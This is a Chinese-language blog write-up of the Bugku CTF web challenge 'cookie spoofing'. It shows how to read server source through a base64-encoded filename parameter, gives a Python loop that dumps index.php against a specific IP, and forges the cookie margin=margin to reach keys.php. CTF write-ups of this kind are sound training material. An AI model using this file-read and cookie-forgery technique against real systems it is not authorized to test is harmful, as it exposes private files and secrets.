Bugku-CTF之cookies欺骗
Day22
cookies欺骗
答案格式:KEY{xxxxxxxx}
本题要点:cookie欺骗、base64编码传参
查看源码
什么也没有
看一下url~ 发现base64编码 解一下
观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt
尝试用 filename访问index.php(原url使用base64,这也将index.php进行编码),line参数应该是行数,试一下 line=1
构造:
http://123.206.87.240:8002/web11/index.php?line=1&filename=aW5kZXgucGhw
将line的值分别改成2、3、4............试了一下好像很多的样子............用py脚本跑一下
代码:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
s=requests.Session()
for i in range(1,20):
payload={'line':str(i),'filename':'aW5kZXgucGhw'}
a=s.get(url,params=payload).content
content=str(a,encoding="utf-8")
print(content)
获得的源码:
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
构造cookie margin=margin 然后读keys.php即可
完成!
--------------------- ┑( ̄Д  ̄)┍ --------------------------
作者:0yst3r[一只在安全领域努力奋斗的小菜鸡]
来源:博客园[ https://www.cnblogs.com/0yst3r-2046/ ] 引用时请注明来源哦~
(๑•̀ㅂ•́)و✧ヽ(✿゚▽゚)ノ(*^▽^*) φ(≧ω≦*)♪
如果本文对你有用,本人不胜欢喜。
The world is your oyster.